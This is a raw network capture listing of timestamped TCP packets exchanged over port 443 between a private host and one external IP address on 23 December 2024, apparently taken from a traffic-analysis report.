                                                                                                        Dec 23, 2024 08:39:29.992767096 CET49734443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:29.998358011 CET44349734147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:29.998373985 CET44349734147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:29.998446941 CET49734443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:29.998462915 CET44349734147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:29.998528004 CET49734443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:30.003046989 CET44349734147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:30.003088951 CET44349734147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:30.003124952 CET49734443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:30.003129959 CET44349734147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:30.003168106 CET49734443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:30.003180981 CET49734443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:30.006191969 CET49734443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:30.920248985 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:30.920301914 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:30.920370102 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:30.921176910 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:30.921192884 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:32.428816080 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:32.436446905 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:32.436481953 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.055402040 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.183450937 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.247626066 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.247643948 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.247695923 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.247699976 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.247720957 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.247747898 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.247761011 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.247773886 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.247773886 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.247788906 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.247807980 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.299808979 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.299820900 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.299868107 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.299889088 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.299901009 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.299911022 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.299946070 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.299966097 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.445374966 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.445415974 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.445461988 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.445476055 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.445503950 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.445523024 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.475912094 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.475976944 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.476037979 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.476048946 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.476098061 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.476120949 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.501890898 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.501916885 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.501975060 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.501986980 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.502006054 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.502026081 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.530194998 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.530220985 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.530263901 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.530275106 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.530291080 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.530337095 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.641041040 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.641073942 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.641139984 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.641160011 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.641177893 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.641201019 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.659725904 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.659746885 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.659807920 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.659818888 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.659863949 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.659887075 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.675040960 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.675071955 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.675137997 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.675148010 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.675184011 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.675194979 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.694019079 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.694040060 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.694164991 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.694202900 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.695525885 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.789066076 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.789096117 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.789196014 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.789217949 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.789272070 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.831981897 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.832003117 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.832103014 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.832122087 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.833393097 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.844532967 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.844549894 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.844639063 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.844650030 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.845974922 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.857256889 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.857281923 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.857352972 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.857368946 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.857407093 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.857424021 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.868216038 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.868241072 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.868331909 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.868344069 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.868586063 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.880000114 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.880038023 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.880080938 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.880089045 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.880132914 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.892894030 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.892923117 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.893007994 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.893014908 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.893086910 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.893086910 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.905275106 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.905301094 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.905401945 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.905410051 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.905647039 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.982570887 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.982606888 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.982681990 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.982692957 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:33.982731104 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:33.982741117 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.022722006 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.022752047 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.022819996 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.022831917 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.022891045 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.022891045 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.032721043 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.032743931 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.032857895 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.032866955 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.032910109 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.039536953 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.039556980 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.039637089 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.039647102 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.039944887 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.045363903 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.045387030 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.045555115 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.045564890 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.046195030 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.051012993 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.051047087 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.051114082 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.051124096 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.051155090 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.051184893 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.056870937 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.056895018 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.056952000 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.056965113 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.056993961 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.057023048 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.062887907 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.062921047 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.062958956 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.062968016 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.062980890 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.063055038 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.173074007 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.173105001 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.173157930 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.173172951 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.173202038 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.173211098 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.211714983 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.211740971 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.211829901 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.211844921 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.211874962 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.211893082 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.217561960 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.217588902 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.217658043 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.217664957 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.217705965 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.217715979 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.222831964 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.222860098 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.222913980 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.222922087 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.222945929 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.222959042 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.228739023 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.228765011 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.228835106 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.228841066 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.228877068 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.228898048 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.234252930 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.234282017 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.234328032 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.234333992 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.234381914 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.240242004 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.240267992 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.240341902 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.240350008 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.240397930 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.246036053 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.246052980 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.246182919 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.246190071 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.246678114 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.365356922 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.365391970 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.365477085 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.365502119 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.365529060 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.365541935 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.403678894 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.403707981 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.403794050 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.403811932 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.403847933 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.403870106 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.409537077 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.409559965 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.409612894 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.409620047 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.409632921 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.409660101 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.415412903 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.415432930 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.415509939 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.415518045 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.415556908 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.415576935 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.420600891 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.420623064 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.420706034 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.420715094 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.420907021 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.426913023 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.426935911 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.427021980 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.427031040 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.427248001 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.432095051 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.432123899 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.432190895 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.432199955 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.432244062 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.432264090 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.438138962 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.438163042 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.438211918 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.438220024 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.438251019 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.438271999 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.557307005 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.557342052 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.557400942 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.557423115 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.557437897 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.558156967 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.596148968 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.596173048 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.596236944 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.596247911 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.596267939 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.596438885 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.601872921 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.601896048 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.601980925 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.601994991 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.602026939 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.602099895 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.607861042 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.607884884 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.607964039 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.607969999 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.608011961 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.608031988 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.613059044 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.613080978 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.613140106 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.613147020 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.613198996 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.613209963 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.619323969 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.619344950 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.619412899 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.619420052 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.619462967 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.619647980 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.624541998 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.624567032 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.624644041 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.624650955 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.624685049 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.624705076 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.630378008 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.630402088 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.630456924 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.630466938 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.630501032 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.630516052 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.749423981 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.749454975 CET44349762147.45.49.155192.168.2.6
                                                                                                        Dec 23, 2024 08:39:34.749502897 CET49762443192.168.2.6147.45.49.155
                                                                                                        Dec 23, 2024 08:39:34.749521017 CET44349762147.45.49.155192.168.2.6
